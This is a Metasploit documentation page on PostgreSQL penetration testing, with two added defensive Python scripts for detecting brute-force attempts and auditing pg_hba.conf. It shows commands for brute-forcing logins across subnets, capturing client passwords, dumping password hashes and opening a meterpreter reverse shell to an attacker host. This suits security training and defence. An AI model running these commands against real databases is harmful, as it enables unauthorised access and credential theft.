metasploit-gs/docs/pentesting/metasploit-guide-postgresql.html

2026-05-08 17:08:43 +00:00
<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>PostgreSQL | Metasploit Documentation Penetration Testing Software, Pen Testing Security</title><meta name="description" content="View Metasploit Framework Documentation" /><link rel="canonical" href="https://rapid7.github.io/metasploit-framework/docs/pentesting/metasploit-guide-postgresql.html" /><link rel="stylesheet" href="/assets/css/just-the-docs-default.css"></head><body><svg xmlns="http://www.w3.org/2000/svg" style="display: none;"><symbol id="svg-link" viewBox="0 0 24 24"><title>Link</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-link"><path d="M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71"></path><path d="M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71"></path></svg></symbol></svg>
</code></pre></div></div><p>Or to search for modules that work with a specific session type:</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="zp">msf</span> <span class="p">&gt;</span> search session_type:postgres
</code></pre></div></div><h3 id="lab-environment"> <a href="#lab-environment" class="anchor-heading" aria-labelledby="lab-environment"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Lab Environment</h3><p>When testing in a lab environment, PostgreSQL can either be installed on the host machine or run within Docker:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker run -it --rm --publish 127.0.0.1:5432:5432 -e POSTGRES_PASSWORD=password postgres:13.1-alpine
</code></pre></div></div><h3 id="postgresql-enumeration"> <a href="#postgresql-enumeration" class="anchor-heading" aria-labelledby="postgresql-enumeration"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> PostgreSQL Enumeration</h3><p>Enumerate version:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_version
run postgres://192.168.123.13
run postgres://postgres:password@192.168.123.13
</code></pre></div></div><h3 id="postgresql-login--bruteforce"> <a href="#postgresql-login--bruteforce" class="anchor-heading" aria-labelledby="postgresql-login--bruteforce"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> PostgreSQL Login / Bruteforce</h3><p>If you have PostgreSQL credentials to validate:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_login
run 'postgres://root: a b c p4$$w0rd@127.0.0.1'
</code></pre></div></div><p>Reusing PostgreSQL credentials in a subnet:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_login
run cidr:/24:postgres://user:pass@192.168.222.0 threads=50
</code></pre></div></div><p>Using an alternative port:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_login
run postgres://user:pass@192.168.123.6:2222
</code></pre></div></div><p>Brute-force host with known user and password list:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_login
run postgres://known_user@192.168.222.1 threads=50 pass_file=./wordlist.txt
</code></pre></div></div><p>Brute-force credentials:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_login
run postgres://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt
</code></pre></div></div><p>Brute-force credentials in a subnet:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_login
run cidr:/24:postgres://user:pass@192.168.222.0 threads=50
run cidr:/24:postgres://user@192.168.222.0 threads=50 pass_file=./wordlist.txt
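</code></pre></div></div><p>The server-side view of the brute-force runs above, as an added example that is not part of the Metasploit documentation: a Python script that reads PostgreSQL server log lines and reports client hosts with a burst of failed logins, counting distinct usernames so a <code class="language-plaintext highlighter-rouge">user_file</code> sweep stands out from a single-user <code class="language-plaintext highlighter-rouge">pass_file</code> run. It assumes the server logs with <code class="language-plaintext highlighter-rouge">log_line_prefix = '%m [%p] %h %u@%d '</code> so each line carries the client host and the attempted user; the log lines are constructed.</p>

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: log_line_prefix = '%m [%p] %h %u@%d ', so every line carries the
# timestamp, pid, client host and the user@database that was attempted.
FAILURE_RE = re.compile(
    r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+ \S+ \[\d+\] (\S+) (\S+)@\S+ FATAL:  "
    r"(?:password authentication failed for user|no pg_hba\.conf entry for host)"
)

# Constructed sample: one legitimate login, a burst of failures across three
# usernames from one host (user_file + pass_file style) and one stray typo.
SAMPLE_LOG = """\
2024-03-15 14:00:01.120 UTC [4101] 10.0.0.5 alice@app LOG:  connection authorized: user=alice database=app
2024-03-15 14:00:05.301 UTC [4102] 192.168.123.1 postgres@template1 FATAL:  password authentication failed for user "postgres"
2024-03-15 14:00:05.322 UTC [4103] 192.168.123.1 postgres@template1 FATAL:  password authentication failed for user "postgres"
2024-03-15 14:00:05.340 UTC [4104] 192.168.123.1 admin@template1 FATAL:  password authentication failed for user "admin"
2024-03-15 14:00:05.358 UTC [4105] 192.168.123.1 admin@template1 FATAL:  password authentication failed for user "admin"
2024-03-15 14:00:05.377 UTC [4106] 192.168.123.1 root@template1 FATAL:  password authentication failed for user "root"
2024-03-15 14:00:05.392 UTC [4107] 192.168.123.1 root@template1 FATAL:  no pg_hba.conf entry for host "192.168.123.1", user "root", database "template1", SSL off
2024-03-15 14:02:30.000 UTC [4120] 10.0.0.5 alice@app FATAL:  password authentication failed for user "alice"
""".splitlines()

def parse_failures(lines):
    """Yield (timestamp, client_host, attempted_user) for each failed login."""
    for line in lines:
        m = FAILURE_RE.match(line)
        if m:
            yield datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"), m.group(2), m.group(3)

def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """Map each client host to its densest burst of at least `threshold` failures
    within `window`; many distinct users in the burst means a user_file sweep."""
    by_host = defaultdict(list)
    for ts, host, user in parse_failures(lines):
        by_host[host].append((ts, user))
    alerts = {}
    for host, events in by_host.items():
        events.sort()
        start, best = 0, None
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:   # slide the window
                start += 1
            count = end - start + 1
            if count >= threshold and (best is None or count > best["failures"]):
                users = {u for _, u in events[start:end + 1]}
                best = {"failures": count, "distinct_users": len(users),
                        "first": events[start][0], "last": events[end][0]}
        if best:
            alerts[host] = best
    return alerts
```

<p>A later "connection authorized" line from the same source is the success the login module is after, so pair the two in the alert.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>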
</code></pre></div></div><h3 id="obtaining-an-interactive-session"> <a href="#obtaining-an-interactive-session" class="anchor-heading" aria-labelledby="obtaining-an-interactive-session"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Obtaining an Interactive Session</h3><p>The CreateSession option for <code class="language-plaintext highlighter-rouge">auxiliary/scanner/postgres/postgres_login</code> allows you to obtain an interactive session for the PostgreSQL instance you're connecting to. Running the module with CreateSession set to true should give you an interactive session.</p><p>For example:</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="zp">msf</span> auxiliary<span class="p">(</span><span class="kc">scanner/postgres/postgres_login</span><span class="p">)</span> <span class="p">&gt;</span> run rhost=127.0.0.1 rport=5432 username=postgres password=password database=template1 createsession=true
</code></pre></div></div><p>Should yield:</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="zg">[+]</span> 127.0.0.1:5432 - Login Successful: postgres:password@template1
<span class="zs">[*]</span> PostgreSQL session 1 opened (127.0.0.1:61324 -&gt; 127.0.0.1:5432) at 2024-03-15 14:00:12 -0500
<span class="zs">[*]</span> Scanned 1 of 1 hosts (100% complete)
<span class="zs">[*]</span> Auxiliary module execution completed
</code></pre></div></div><p>You can interact with your session using <code class="language-plaintext highlighter-rouge">sessions -i -1</code> or <code class="language-plaintext highlighter-rouge">sessions &lt;session id&gt;</code>. Use the help command for more info.</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="zp">msf</span> auxiliary<span class="p">(</span><span class="kc">scanner/postgres/postgres_login</span><span class="p">)</span> <span class="p">&gt;</span> sessions
Active sessions
===============

  Id  Name        Type        Information                Connection
  --  ----        ----        -----------                ----------
  1   postgresql  PostgreSQL  postgres @ 127.0.0.1:5432  127.0.0.1:61324 -&gt; 127.0.0.1:5432 (127.0.0.1)

<span class="zp">msf</span> auxiliary<span class="p">(</span><span class="kc">scanner/postgres/postgres_login</span><span class="p">)</span> <span class="p">&gt;</span> sessions -i 1
<span class="zs">[*]</span> Starting interaction with 1...
</code></pre></div></div><p>When interacting with a session, the help command can be useful:</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code>postgresql @ 127.0.0.1:5432 (template1) &gt; help
Core Commands
=============

    Command     Description
    -------     -----------
    ?           Help menu
    background  Backgrounds the current session
    bg          Alias for background
    exit        Terminate the PostgreSQL session
    help        Help menu
    irb         Open an interactive Ruby shell on the current session
    pry         Open the Pry debugger on the current session
    sessions    Quickly switch to another session


PostgreSQL Client Commands
==========================

    Command            Description
    -------            -----------
    query              Run a single SQL query
    query_interactive  Enter an interactive prompt for running multiple SQL queries


Local File System Commands
==========================

    Command  Description
    -------  -----------
    getlwd   Print local working directory (alias for lpwd)
    lcat     Read the contents of a local file to the screen
    lcd      Change local working directory
    ldir     List local files (alias for lls)
    lls      List local files
    lmkdir   Create new directory on local machine
    lpwd     Print local working directory


This session also works with the following modules:

  auxiliary/admin/postgres/postgres_readfile
  auxiliary/admin/postgres/postgres_sql
  auxiliary/scanner/postgres/postgres_hashdump
  auxiliary/scanner/postgres/postgres_schemadump
  auxiliary/scanner/postgres/postgres_version
  exploit/linux/postgres/postgres_payload
  exploit/multi/postgres/postgres_copy_from_program_cmd_exec
  exploit/multi/postgres/postgres_createlang
  exploit/windows/postgres/postgres_payload
</code></pre></div></div><p>Once you've done that, you can run any Postgres query against the target using the <code class="language-plaintext highlighter-rouge">query</code> command:</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code>postgresql @ 127.0.0.1:5432 (template1) &gt; query -h
Usage: query

Run a single SQL query on the target.

OPTIONS:

    -h, --help      Help menu.
    -i, --interact  Enter an interactive prompt for running multiple SQL queries

Examples:

    query SELECT user;
    query SELECT version();
    query SELECT * FROM pg_catalog.pg_tables;

postgresql @ 127.0.0.1:5432 (template1) &gt; query 'SELECT version();'
<span class="zs">[*]</span> SELECT 1
Response
========

    #  version
    -  -------
    0  PostgreSQL 14.1 on aarch64-apple-darwin20.6.0, compiled by Apple clang version 12.0.5 (clang-1205.0.22.9), 64-bit
</code></pre></div></div><p>Alternatively, you can enter a SQL prompt via the <code class="language-plaintext highlighter-rouge">query_interactive</code> command, which supports multiline commands:</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code>postgresql @ 127.0.0.1:5432 (template1) &gt; query_interactive -h
Usage: query_interactive

Go into an interactive SQL shell where SQL queries can be executed.
To exit, type 'exit', 'quit', 'end' or 'stop'.

postgresql @ 127.0.0.1:5432 (template1) &gt; query_interactive
<span class="zs">[*]</span> Starting interactive SQL shell for postgresql @ 127.0.0.1:5432 (template1)
<span class="zs">[*]</span> SQL commands ending with ; will be executed on the remote server. Use the exit command to exit.
SQL &gt;&gt; SELECT table_name
SQL *&gt; FROM information_schema.tables
SQL *&gt; LIMIT 2;
<span class="zs">[*]</span> Executing query: SELECT table_name FROM information_schema.tables LIMIT 2;
<span class="zs">[*]</span> SELECT 2
Response
========

    #  table_name
    -  ----------
    0  pg_statistic
    1  pg_type

SQL &gt;&gt;
</code></pre></div></div><h3 id="postgresql-capture-server"> <a href="#postgresql-capture-server" class="anchor-heading" aria-labelledby="postgresql-capture-server"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> PostgreSQL Capture Server</h3><p>Capture and log PostgreSQL credentials:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/server/capture/postgresql
run
</code></pre></div></div><p>For example, if a client connects with:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>psql postgres://postgres:mysecretpassword@localhost:5432
</code></pre></div></div><p>Metasploit's output will be:</p><div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="zp">msf</span> auxiliary<span class="p">(</span><span class="kc">server/capture/postgresql</span><span class="p">)</span> <span class="p">&gt;</span>
<span class="zs">[*]</span> Started service listener on 0.0.0.0:5432
<span class="zs">[*]</span> Server started.
<span class="zg">[+]</span> PostgreSQL LOGIN 127.0.0.1:60406 postgres / mysecretpassword / postgres
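</code></pre></div></div><p>The psql invocation above hands its password to whatever answers on port 5432, and a server whose pg_hba.conf accepts password or md5 logins on non-TLS connections exposes the same credential on the wire. As an added example that is not part of the Metasploit documentation, this Python script parses a pg_hba.conf and flags the rules that invite the capture and brute-force scenarios on this page: trust over the network, cleartext password or md5 methods, rules reachable from any address, and host/hostnossl rules for password-based methods. The pg_hba.conf content is constructed.</p>

```python
import ipaddress

METHOD_RISK = {"trust": ("critical", "no credential required at all"),
               "password": ("high", "cleartext password readable on the wire"),
               "md5": ("medium", "stored md5 hash is password-equivalent; use scram-sha-256")}
PASSWORD_METHODS = ("password", "md5", "scram-sha-256")
SAMPLE_HBA = """\
# constructed pg_hba.conf for this example: TYPE DATABASE USER ADDRESS METHOD
local      all  postgres                          peer
host       all  all       127.0.0.1/32            scram-sha-256
host       all  all       0.0.0.0/0               md5
host       app  app       10.0.0.0 255.255.255.0  trust
hostnossl  all  all       192.168.123.0/24        password
"""

def parse_hba(text):
    """Parse pg_hba.conf records; handles CIDR and 'address netmask' forms."""
    records = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        f = raw.split("#", 1)[0].split()
        if not f:
            continue
        rec, i = {"line": lineno, "type": f[0], "database": f[1], "user": f[2]}, 3
        if f[0] != "local":
            addr, i = f[3], 4
            if "/" not in addr and len(f) > 4 and f[4][:1].isdigit():
                addr, i = f"{addr}/{f[4]}", 5      # 'ip netmask' form
            rec["address"] = addr
        rec["method"] = f[i]
        records.append(rec)
    return records

def exposure(address):
    """'any', 'loopback' or 'range' for a rule's ADDRESS field."""
    try:
        net = ipaddress.ip_network(address, strict=False)
    except ValueError:          # all, samehost, samenet, a hostname, or a local rule
        return "any" if address == "all" else "range"
    if net.is_loopback:
        return "loopback"
    return "any" if net.prefixlen == 0 else "range"

def audit_hba(text):
    """Return [(line, severity, finding)] for rules inviting the scenarios on this page."""
    findings = []
    for r in parse_hba(text):
        t, m, line = r["type"], r["method"], r["line"]
        if m in METHOD_RISK and not (m == "trust" and t == "local"):
            findings.append((line, METHOD_RISK[m][0], f"{m}: {METHOD_RISK[m][1]}"))
        reach = exposure(r.get("address", ""))
        if reach == "any":
            findings.append((line, "high", f"{t} rule reachable from any address ({r['address']})"))
        if t in ("host", "hostnossl") and reach != "loopback" and m in PASSWORD_METHODS:
            findings.append((line, "medium", f"{t} permits non-TLS connections; use hostssl"))
    return findings
```

<p>On the client side, <code class="language-plaintext highlighter-rouge">sslmode=verify-full</code> (and <code class="language-plaintext highlighter-rouge">channel_binding=require</code> with SCRAM) keeps the psql connection above from handing its password to an impostor listener.</p>

<div class="language-msf highlighter-rouge"><div class="highlight"><pre class="highlight"><code>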
</code></pre></div></div><h3 id="postgresql-dumping"> <a href="#postgresql-dumping" class="anchor-heading" aria-labelledby="postgresql-dumping"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> PostgreSQL Dumping</h3><p>User and hash dump:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_hashdump
run postgres://postgres:password@192.168.123.13
run postgres://postgres:password@192.168.123.13/database_name
</code></pre></div></div><p>Schema dump:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/postgres/postgres_schemadump
run postgres://postgres:password@192.168.123.13
run postgres://postgres:password@192.168.123.13 ignored_databases=template1,template0,postgres
</code></pre></div></div><h3 id="postgresql-querying"> <a href="#postgresql-querying" class="anchor-heading" aria-labelledby="postgresql-querying"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> PostgreSQL Querying</h3><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/admin/postgres/postgres_sql
run 'postgres://user:this is my password@192.168.1.123/database_name' sql='select version()'
</code></pre></div></div><h3 id="postgresql-reverse-shell"> <a href="#postgresql-reverse-shell" class="anchor-heading" aria-labelledby="postgresql-reverse-shell"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> PostgreSQL Reverse Shell</h3><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use exploit/linux/postgres/postgres_payload
run postgres://postgres:password@192.168.123.6 lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\ x86_64'
</code></pre></div></div><hr><footer><p><a href="#top" id="back-to-top">Back to top</a></p><p class="text-small text-grey-dk-000 mb-0"> <a href="https://github.com/rapid7/metasploit-framework/tree/master/docs/metasploit-framework.wiki/Metasploit-Guide-PostgreSQL.md" id="edit-this-page">Edit this page on GitHub</a></p></footer></div></div></div></body></html>